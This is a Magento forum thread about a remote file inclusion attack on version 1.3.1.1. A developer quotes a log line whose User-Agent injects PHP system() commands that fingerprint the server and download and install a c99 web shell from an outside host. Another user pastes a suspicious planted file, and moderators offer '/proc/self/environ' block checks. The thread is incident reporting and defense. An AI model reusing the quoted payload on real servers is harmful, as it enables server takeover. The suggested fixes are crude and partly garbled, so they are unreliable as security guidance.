Magento Forum

   
Magento 1.3.1.1 Rmote File Inclusion Vunerability
 
miromedia
Jr. Member
 
Total Posts:  8
Joined:  2009-04-08
Kenilworth UK
 

Hello All

One of our clients recently suffered a RFI hack whilst running version 1.3.1.1 of Magento. Below is my report on what happened (as far as we could tell from server logs), names and places have been changed to protect the identity of the client.

-----------------------
The hacks suffered by the site were a result of external users exploiting certain weaknesses within the Magento code base. These weaknesses allowed hackers to upload and run code directly on the web server in a type of attack known as Remote File Inclusion (RFI).

In this RFI hack the user exploited parts of the code which are vulnerable in version 1.3.1.1 of Magento. One of the hack attempts appeared via the URL used to compare products on the site, this entry being captured in the Apache logs for the domain

91.121.11.142 - - [XX/XX/XXXX:16:32:46 +0100] "GET /catalog/product_compare/add/pr...aGFpbi5odG1sP19fX1NJRD1V//index2.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ&#x00; HTTP/1.1" 200 2178 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo  ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo  ;'); ?>XUNAMEXUSERID<?php echo system('id;echo  ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo  ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('lwp-download http://tools.quickhw.com/c99.txt;mv c99.txt memek.php; chmod 755 memek.php; ls -al memek.php; echo    ; exit;'); ?></pre>EXPLORE"

This example shows the hacker has passed a number of variables as part of the HTTP request after the index.php?, including commands to download the shell file: c99.txt and then rename to memek.php file (using the shell command mv c99.txt memek.php). The memek.php file can now be executed externally within a browser. This exploit in Magento was closed by returning false from the getAddUrl() function in the Magento code base file:

app/code/core/Mage/Catalog/Helper/Product/Compare.php

The getAddUrl() function would then read:

public function getAddUrl($product)
    
{
        
#return $this->_getUrl('catalog/product_compare/add', $this->_getUrlParams($product));
        # We disable compare functionality by commenting out the real return statement and returning false instead.
        
return false;
    
}

In addition to closing potential security risks within Magento’s code we also added changes at source on the server to prevent hack attempts from gaining access in the first place and restricted the use of some shell commands typically used in RFI attacks. These changes include updating permissions on the wget, curl and lynx commands so only the root user can execute them. To be a root user on the server a hacker would need to know the root user password as well as getting the hacked files uploaded.

Further restrictions were put in place on the server with the use of the PHP plugin mod_security. This allows the server to fully log HTTP requests and responses made to and from the server and monitor these requests to ensure that no malicious attacks can be made; by filtering out particular characters or data before it gets to the web server. What is allowed or denied by the plugin is defined by the its rulesets and these can be as restrictive or open as required. Typically the module will stop attacks in the form of HTML or CSS code being passed via the request URL along with other code requests.

---------------------------------------

Since implementing the changes detailed above we have not seen any further successfully attacks, although there have been attempts made. This is clearly a very important security flaw with the Magento and/or Zend Framework code that everyone needs to be aware of as hack of these types could prove catastrophic for the client and result in down time or complete loss of service.

If anyone knows if these problems have been fixed in Magento verion 1.4 we would be very grateful for the info.

Andrew

 
Magento Community Magento Community
Magento Community
Magento Community
 
chefbri
Jr. Member
 
Total Posts:  11
Joined:  2008-11-02
Albuquerque New Mexico
 

I just found this file type in my site using 1.3.1

I don\’t know what this code would do????

Can I just upgrade and have all code removed that way or do I have to go through all the files and look for added code?

Thanks,
Brian

<?php ob_start() ?>
<?php
if ($_GET[\'randomId\'] != \"kzlAcKtApisYhnXJV8GFeAmvdRH5vPOvOUFzhxjq9R7Od_DDHCBgFQ_MDXEH8bn1qsHCQOqMp8DSLVCAjw7tUAIx0QIrfOfZhJ8uVJT7HenaAINAaOO1R51h7wn3wVVC2HtTM9lQpcx3NgP0I2cZWfyjdiXJFmxacXQWpFlZcumxvWp3I2AjyBekHjHancwI5WOc11jQHgvyBOrNIBtqnyMIiXfxdQ9FSqQcVusV3DDWGAwzu7mxtDGWYAvIhp3j\") {
echo \"Access Denied\";
exit();
}
?>
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">
<html>
<head>
<title>Editing password_new.html</title>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=us-ascii\">
<style type=\"text/css\">body {background-color:threedface; border: 0px 0px; padding: 0px 0px; margin: 0px 0px}</style>
</head>
<body>
<div align=\"center\">

<div id=\"saveform\" style=\"display:none;\">
<form METHOD=\"POST\" name=mform action=\"http://www.leatherlingerie.org:2082/frontend/x3/filemanager/savehtmlfile.html\">
<input type=\"hidden\" name=\"charset\" value=\"us-ascii\">
<input type=\"hidden\" name=\"baseurl\" value=\"http://leatherlingerie.org/app/locale/en_US/template/email/\">
<input type=\"hidden\" name=\"basedir\" value=\"/home/leatherl/public_html/\">
<input type=\"hidden\" name=\"udir\" value=\"/home/leatherl/public_html/app/locale/en_US/template/email\">
<input type=\"hidden\" name=\"ufile\" value=\"password_new.html\">
<input type=\"hidden\" name=\"dir\" value=\"&#x2f;home&#x2f;leatherl&#x2f;public_html&#x2f;app&#x2f;locale&#x2f;en_US&#x2f;template&#x2f;email\">
<input type=\"hidden\" name=\"file\" value=\"password_new.html\">
<input type=\"hidden\" name=\"doubledecode\" value=\"1\">
<textarea name=page rows=1 cols=1>

 
Magento Community Magento Community
Magento Community
Magento Community
 
edmondscommerce
Guru
 
Avatar
Total Posts:  342
Joined:  2008-08-26
 

this has been discussed

see this thread

http://www.magentocommerce.com/boards/viewthread/206501/P0/

thanks for bringing it up though

its not yet totally clear if 1.4 is affected or not

 
Magento Community Magento Community
Magento Community
Magento Community
 
J_T_
Moderator
 
Avatar
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Rather than disabling Magento’s compare feature this way, wouldn’t it be better to change what feeds the _getUrlParams function instead?

Now in Mage Core Helpder URL.php:

public function getEncodedUrl($url=null)
    
{
        
if (!$url{
            $url 
$this->getCurrentUrl();
        
}
        
return $this->urlEncode($url);
    
}

Pseudo-code that sanitises against proc self environ attacks:

public function getEncodedUrl($url=null)
    
{
        
if (!$url{
            $url 
$this->getCurrentUrl();
        
}
        
if ($url  DOES NOT CONTAIN 'proc/self/environ'{
             
return $this->urlEncode($url);
        
else {
             
return false;
        
}
    }

That can then be expanded to disallow a number of URL based attacks, like parameters containing <string> etc.

 
Magento Community Magento Community
Magento Community
Magento Community
 
J_T_
Moderator
 
Avatar
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Another method, which I’m applying on somebody’s install on a cheap host which doesn’t give me full set of the usual security tools…

In index.php:

if (((isset($_GET['controller']) && strpos($_GET['controller']'/proc/self/environ') !== false)) OR (strpos($_SERVER['REQUEST_URI']'/proc/self/environ') !== false)) {
    
//Attack
    
exit('<!-- Not Welcome-->');
}

That seems to at least stop that one specific attack in its tracks.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
    Back to top